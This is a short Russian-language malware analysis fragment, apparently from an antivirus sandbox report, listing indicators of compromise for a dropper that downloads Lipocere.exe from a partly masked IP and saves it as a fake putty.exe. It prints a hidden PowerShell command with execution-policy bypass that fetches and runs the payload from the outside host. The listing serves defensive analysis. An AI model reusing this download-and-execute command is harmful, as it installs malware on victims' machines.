Техническая информация
- http://35.##8.83.21/lipocere.exe как %appdata%\putty.exe
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\putty.exe
- %TEMP%\drdtfhgygeghd{В .sct
- %APPDATA%\putty.exe
- %LOCALAPPDATA%\filenes\dumpinger123\handelsmonopolets110\markedskrfter\bobslde.dis
- %LOCALAPPDATA%\filenes\dumpinger123\handelsmonopolets110\markedskrfter\green_leaves_16.bmp
- %LOCALAPPDATA%\filenes\dumpinger123\rodendes\krlighedsforholdene\brylluppers.lit
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\sikkerhedsblterne.ini
- %TEMP%\nso43f3.tmp\system.dll
- %TEMP%\nse4efb.tmp\system.dll
- %TEMP%\nsj4e7e.tmp\system.dll
- %TEMP%\drdtfhgygeghd{В .sct
- '35.##8.83.21':80
- http://35.##8.83.21/Lipocere.exe
- ClassName: '#32770' WindowName: ''
- '%APPDATA%\putty.exe'
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\putty.exe' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://35.##8.83.21/Lipocere.exe','%APPDATA%\putty.exe')' (со скрытым окном)